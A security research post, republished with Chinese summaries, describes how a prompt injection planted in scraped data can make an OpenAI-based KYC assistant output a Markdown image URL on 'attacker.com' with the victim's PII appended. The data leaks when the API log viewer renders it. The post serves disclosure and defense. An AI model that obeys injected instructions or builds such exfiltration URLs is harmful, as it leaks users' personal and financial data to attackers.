OpenAI API 日志:未修补的数据泄露
OpenAI API Logs: Unpatched data exfiltration

原始链接: https://www.promptarmor.com/resources/openai-api-logs-unpatched-data-exfiltration

## OpenAI平台漏洞:通过API日志泄露数据 OpenAI平台存在一个关键漏洞,使用“responses”和“conversations”API构建的应用程序和代理容易发生数据泄露。这源于API日志中不安全的Markdown渲染——即使应用程序本身阻止了恶意Markdown图片。 攻击链涉及将恶意提示注入到AI应用程序使用的数据源中(例如KYC工具)。这会操纵AI生成一个包含敏感用户数据的URL的Markdown图片。虽然应用程序*可能*会阻止渲染此图片,但漏洞在于OpenAI平台的API日志查看器。当开发者在日志中查看标记的对话时,Markdown会被渲染,从而触发对攻击者服务器的请求并泄露被盗数据。 这不仅影响直接使用这些API构建的应用程序,还影响OpenAI的开发工具,如Agent Builder、Assistant Builder、ChatKit,以及可能将OpenAI列为子处理者的任何供应商。尽管通过BugCrowd向OpenAI进行了负责任的披露,但报告被关闭为“不适用”,促使公开发布以告知用户和开发者采取预防措施。

一份最新报告详细说明了 OpenAI API 中的数据泄露漏洞,尽管已存在安全措施。该问题并非源于对 OpenAI 或用户数据的直接攻击,而是来自第三方攻击者“污染”人工智能应用程序(如 KYC 应用程序)使用的数据源。 其工作原理如下:攻击者将恶意代码注入到公开的在线数据中。当人工智能应用程序处理这些数据时,注入的代码导致敏感信息被发送到攻击者的域名——这可以通过 OpenAI 的日志查看器看到,该查看器会自动加载远程图像。 重要的是,攻击者从不直接与 LLM 的响应交互;他们通过观察日志来检索数据。虽然应用程序开发者本身可以访问用户数据,但令人担忧的是,OpenAI 保护用户免受开发者滥用的说法并未完全实现,因为日志查看器促成了数据泄露。
相关文章

原文
OpenAI API logs insecurely render AI ouputs, exfiltrating data from apps and agents that use the OpenAI Platform

Context

The OpenAI Platform interface has a vulnerability that exposes all AI applications and agents built with OpenAI ‘responses’ and ‘conversations’ APIs to data exfiltration risks due to insecure Markdown image rendering in the API logs. ‘Responses’ is the default API recommended for building AI features (and it supports Agent Builder) — vendors that list OpenAI as a subprocessor are likely using this API, exposing them to the risk. This attack succeeds even when developers have built protections into their applications and agents to prevent Markdown image rendering.

Attacks in this article were responsibly disclosed to OpenAI (via BugCrowd). The report was closed with the status ‘Not applicable’ after four follow-ups (more details in the Responsible Disclosure section). We have chosen to publicize this research to inform OpenAI customers and users of apps built on OpenAI, so they can take precautions and reduce their risk exposure.

Additional findings at the end of the article impact five more surfaces: Agent Builder, Assistant Builder, and Chat Builder preview environments (for testing AI tools being built), the ChatKit Playground, and the Starter ChatKit app, which developers are provided to build upon.

The Attack Chain

  1. An application or agent is built using the OpenAI Platform

    In this attack, we demonstrate a vulnerability in OpenAI's API log viewer. To show how an attack would play out, we created an app with an AI assistant that uses the ‘responses’ API to generate replies to user queries. 

    An AI feature is created using the default recommended 'responses' API to generate AI outputs.

    For this attack chain, we created an AI assistant in a mock Know Your Customer (KYC) tool. KYC tools enable banks to verify customer identities and assess risks, helping prevent financial crimes — this process involves sensitive data (PII and financial data provided by the customer) being processed alongside untrusted data (including data found online) used to validate the customer's attestations.

  2. The user interacts with the AI assistant or agent built using the OpenAI ‘responses’ or ‘conversations’ API

    An AI 'KYC' tool ingests sensitive data (user PII in attestations) alongside untrusted data containing a prompt injection (in OSINT data).

    Here, 6 data sources are pulled in as part of the KYC review process for this customer. One of these data sources contains content scraped from the internet that has been poisoned with a prompt injection.

  3. When the user selects one of the recommended queries, the AI app blocks the data exfiltration attack

    A malicious AI output is flagged, and blocked, instead of being displayed to the user.

    In this step, the prompt injection in the untrusted data source manipulates the AI model to output a malicious Markdown image. The image URL is dynamically generated and contains the attacker’s domain with the victim’s data appended to the URL:

    attacker.com/img.png?data={AI appends victim’s sensitive data here}

    However, the malicious response is flagged by an LLM as a judge and blocked, so it is not rendered by the AI app.

    Note: this attack can occur without an LLM as a judge; more details in Attacking Systems with Alternative Image Defenses.

  4. The flagged conversation is selected for review in the OpenAI platform, which uses Markdown

    When investigating the flagged conversation, the first step a developer would likely take is opening the OpenAI API logs and reviewing the conversation. The logs for the OpenAI ‘responses’ and ‘conversations’ APIs are displayed using Markdown formatting.

    OpenAI's API logs for the 'responses' and 'conversations' APIs are rendered using Markdown.
  5. The AI output that was blocked in the KYC app is rendered as Markdown in the log viewer, exfiltrating sensitive data

    When the conversation log for the flagged chat is opened, the response containing a malicious Markdown image is rendered in the OpenAI Platform's API Log viewer. Remember, this is the same response that was not rendered in the AI KYC app because an application-level defense blocked it!

    When the image is rendered in the OpenAI Logs viewer, a request to retrieve the image is made to the URL generated by the model in step 3. This results in data exfiltration, as the URL was created using the attacker's domain with the victim's sensitive data appended on the end. Since the image is on the attacker's domain, the attacker can read the full URL that was requested from their site, including the appended PII (SSN, passport, etc.) and financials (credit history).

    The AI response that was blocked and not displayed in the AI KYC tool is rendered as Markdown in the API log viewer.
  6. Attackers can view the victim’s exfiltrated PII (passport, license, etc.) and financials (net worth, bank choice, etc.)

    Sensitive PII (license, passport, etc.) and other data is visible in the attacker's server request log.

Attacking Systems with Alternative Image Defenses

In the attack chain above, the malicious response containing a Markdown image was blocked by an LLM as a judge. But, there are many other defenses that can be used to prevent Markdown images from rendering (which can protect the user until the insecure API log is opened).

These defenses include:

  • Content security policies

  • Programmatic sanitization of Markdown images from AI output

  • AI outputs not being rendered using Markdown in the AI app; plain text only

Apps that use these defenses can still be impacted. As an example, one common feedback mechanism is the thumbs-up / thumbs-down in chat. Usually, responses that encounter a prompt injection result in malformed or manipulated output. If a user selects  ‘thumbs down’ on that response, it will be flagged for review, allowing for the attack chain to occur in the OpenAI Logs.

Here we can see Perplexity, which uses thumbs-up/thumbs-down feedback. Below is a Perplexity response that was programmatically sanitized, stripping a Markdown image. It leaves an odd, empty response, to which a user may reasonably react with ‘thumbs down’.

If a developer goes to review this, they may be affected by the same attack chain described above.

The Complete Attack Surface

Insecure Markdown rendering has been identified in the logs for the ‘responses’ and ‘conversations’ APIs. As mentioned, systems built using these APIs include:

  • Agent Builder

  • Assistants

  • AI features from vendors that list OpenAI as a subprocessor (since Responses is the default API for building AI features).

Additionally, the preview interfaces used to test AI tools being developed in the OpenAI platform also exhibited insecure Markdown image rendering (meaning that a prompt injection could exfiltrate data when anyone is testing their systems). This includes: 

  • Create Chat

  • Create Assistant

  • and Agent Builder.

Similarly, the Starter ChatKit App, ChatKit Playground, and Widget Builder (used by developers to get off the ground while building AI apps) lack defenses against insecure image rendering.

Responsible Disclosure

Given the varied ways in which prompt injections can exploit systems, triaging prompt injection vulnerabilities is challenging – they are often difficult to classify under existing vulnerability taxonomies. After coordination with triagers, this report was determined to be 'Not Applicable' for the OpenAI BugCrowd program.

Nov 17, 2025 Initial report submitted
Nov 20, 2025 Reproducible step-by-step provided
Nov 24, 2025 Clarification questions answered
Nov 25, 2025 Clarification questions answered
Nov 26, 2025 Clarification questions answered
Dec 04, 2025 Report closed as 'Non-Applicable'

联系我们 contact @ memedata.com